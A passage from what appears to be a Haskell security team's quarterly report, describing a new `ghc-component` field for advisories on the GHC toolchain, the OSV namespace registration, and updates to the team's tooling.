for embargoed vulnerabilities, which will be published later.

We ask community members to report any known security issues,
including historical issues, that are not yet included.


## Advisories for the GHC toolchain

Following preparatory work last year, 2025-Q1 saw the publication of
the first advisories for components of the GHC toolchain itself. To
declare a GHC component as affected in an advisory, set the
`ghc-component` field (cf. `package` for the Hackage namespace):

```toml
[[affected]]
ghc-component = "ghc"
```

The valid `ghc-component` values are: `ghc`, `ghci`, `rts`,
`ghc-pkg`, `runghc`, `ghc-iserv`, `hp2ps`, `hpc`, `hsc2hs`, and
`haddock`.

We registered the `GHC` namespace in the OSV schema. Advisories can
be browsed on OSV.dev: https://osv.dev/list?q=&ecosystem=GHC.


## Tooling updates

- Gautier updated our tooling to build with GHC 9.10 and 9.12
  support. This involved switching our Atom feed generation from
  the unmaintained *feed* library to *atom-conduit*.
--------------------------------------------------------------------------------